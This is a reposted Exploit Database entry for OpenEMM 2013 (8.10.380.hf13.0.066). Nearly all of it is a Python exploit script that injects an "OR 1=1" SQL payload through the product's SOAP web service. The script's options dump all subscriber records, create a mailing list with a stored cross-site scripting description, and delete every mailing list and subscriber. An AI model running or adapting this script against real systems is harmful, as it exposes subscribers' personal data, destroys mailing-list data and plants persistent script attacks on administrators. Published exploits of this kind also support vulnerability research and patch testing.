OpenEMM-2013 8.10.380.hf13.0.066 – SOAP SQL Injection / Persistent Cross-Site Scripting

• Exploit Database
• 107 阅读

• 作者： drone
  日期： 2013-07-29
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/27187/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108

  import os import sys from SOAPpy import WSDL from argparse import ArgumentParser from re import sub # Exploit Title: OpenEMM 2013 SQL Injection / Stored XSS # Date: 07/20/2013 # Exploit Author: drone (@dronesec) # More information (and required WSDL file): # http://forelsec.blogspot.com/2013/07/openemm-2013-810380hf130066-soap-sql.html # Vendor Homepage: http://www.openemm.org/ # Software Link: https://downloads.sourceforge.net/project/openemm/OpenEMM%20software/OpenEMM%202013/OpenEMM-2013-bin.tar.gz # Version: 2013 (8.10.380.hf13.0.066) # Tested on: Ubuntu 12.04 """ Exploits a host of vulnerabilities discovered in OpenEMM. Required ws.wsdl file should be in local directory. """ def run(options): """ run exploit """ wsdl_file = "./ws.wsdl" sploit = "\\' OR 1=1;-- " _server = WSDL.Proxy(wsdl_file) if options.subscribers: # iterate until we get a null response idx = 1 while True: ret = _server.getSubscriber("wsadmin", sploit, idx) if ret.paramValues == '': print '[!] Discovered %d subscribers'%(idx-1) break print ret.paramValues idx += 1 elif options.mlist: try: print '[!] Description field vulnerable to stored xss!' description = raw_input('[!] Enter mlist description: ') except: description = '' ret = _server.addMailinglist('wsadmin', sploit, options.mlist, description) if ret > 0: print '[!] Saved successfully' else: print '[!] Save unsuccessful' elif options.dmlist: print '[!] Deleting all mailing lists...' idx = 1 while True: ret = _server.deleteMailinglist('wsadmin', sploit, idx) if ret == 0: print '[!] Deleted %d mailing lists.'%idx break idx += 1 elif options.dsubs: print '[!] Deleting all subscribers...' idx = 1 while True: ret = _server.deleteSubscriber('wsadmin', sploit, idx) if ret == 0: print '[!] Deleted %d subscribers.'%idx break idx += 1 def parse_args(): """ parse args and sub in the desired IP """ parser = ArgumentParser() parser.add_argument('-i', help='server address', action='store', dest='host', required=True) parser.add_argument('-s', help='fetch all subscribers', action='store_true', dest='subscribers') parser.add_argument('-m', help='create new mailing list (XSS)', action='store', dest='mlist') parser.add_argument('--dm', help='delete all mailing lists', action='store_true', dest='dmlist') parser.add_argument('--ds', help='delete all subscribers', action='store_true', dest='dsubs') options = parser.parse_args() try: # sub in server address with open('ws.wsdl', 'r') as f: out = open('tmp.wsdl', 'w+') for line in f: line = sub('location="(.*?)"', 'location="http://{0}:8080/emm_webservice"'.format(options.host), line) out.write(line) out.close() except IOError: print '[-] ws.wsdl not found' sys.exit(1) # replace ws.wsdl with temp one os.system('mv tmp.wsdl ws.wsdl') return options if __name__ == "__main__": options = parse_args() run(options)